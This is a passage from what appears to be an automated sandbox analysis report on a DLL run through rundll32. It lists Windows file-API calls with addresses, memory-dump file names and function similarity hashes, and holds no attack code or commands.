                              • CreateFileW.KERNEL32(00000000,6CD7835C,00000016,F6A49D28,6CD81084,40000000,00000001,00000000,00000004,00000000,00000000), ref: 6CD526DB
                              • GetLastError.KERNEL32 ref: 6CD52713
                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 6CD52725
                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 6CD5273D
                              • CloseHandle.KERNEL32(000000FF), ref: 6CD52747
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastPointerWrite
                              • String ID:
                              • API String ID: 170361235-0
                              • Opcode ID: a496d619c835c7e43a0b919234d6636ae76c08fb0e7d2e8cc643519b85aa9907
                              • Instruction ID: 3f1f36d020c915cd592e4e3ecba8d4696b71eb4a9c80d4df09b741fc4652f337
                              • Opcode Fuzzy Hash: a496d619c835c7e43a0b919234d6636ae76c08fb0e7d2e8cc643519b85aa9907
                              • Instruction Fuzzy Hash: 8E219070B10204AFEF14DFA4CD4AF9937B8AB46704F50811AF705AB6D0DB30A9058BA0
                              APIs
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: codecvt
                              • String ID:
                              • API String ID: 3662085145-0
                              • Opcode ID: 37320b71a7be83556b002174ec9fc3dd33e1032fb330f3e4f87ae76041f4c033
                              • Instruction ID: 646a2e5a06cecb3fb507baee41b3abc8541b517d25ab7457d06c7c1104f644e0
                              • Opcode Fuzzy Hash: 37320b71a7be83556b002174ec9fc3dd33e1032fb330f3e4f87ae76041f4c033
                              • Instruction Fuzzy Hash: 6431C678A0120ADFEB04EF95D994BADB7BABB95308F104419D62137FA0D7752A84CF90